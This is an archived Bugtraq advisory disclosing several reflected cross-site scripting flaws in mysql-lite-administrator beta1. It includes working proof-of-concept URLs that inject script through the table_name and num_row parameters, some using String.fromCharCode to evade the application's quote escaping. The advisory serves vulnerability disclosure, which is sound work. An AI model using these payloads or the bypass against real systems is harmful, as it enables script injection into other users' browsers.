[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

mysql-lite-administrator XSS vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: mysql-lite-administrator XSS vulnerabilities
From: apparitionsec@xxxxxxxxx
Date: Sun, 21 Jun 2015 06:36:02 GMT

[+] Credits:  hyp3rlinx

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt



Vendor:
=============================================
code.google.com/p/mysql-lite-administrator



Product:
==================================================
mysql-lite-administrator(beta1)



Advisory Information:
==============================
Multiple XSS vulnerabilities



Vulnerability Details:
======================
mysql-lite-administrator is vulnerable to XSS attacks, the application escapes 
injected strings. e.g. 'HELL' becomes \'HELL\' but we can easily defeat that 
using Javascript functions String.charCodeAt() & String.fromCharCode()


XSS Exploit code(s):
====================

http://localhost/mysql-lite-administrator(beta1)/tabella.php?table_name=<script>alert(String.fromCharCode(72,69,76,76))</script>

http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=<script>alert(666)</script>

http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row="><script>alert(String.fromCharCode(72,69,76,76))</script>

http://localhost/mysql-lite-administrator(beta1)/insert.php?table_name=<script>alert(666)</script>



Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 21, 2015 : Public Disclosure



Severity Level:
=========================================================
Med



Description:
==========================================================

Request Method(s):         [+] GET 


Vulnerable Product:        [+] mysql-lite-administrator (beta1)


Vulnerable Parameter(s):   [+] table_name, num_row
                       

Affected Area(s):          [+] tabella.php & coloni.php
                                                       

===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.


(hyp3rlinx)

Prev by Date: mysql-lite-administrator XSS vulnerabilities
Next by Date: GeniXCMS XSS Vulnerabilities
Previous by thread: mysql-lite-administrator XSS vulnerabilities
Next by thread: GeniXCMS XSS Vulnerabilities
Index(es):
- Date
- Thread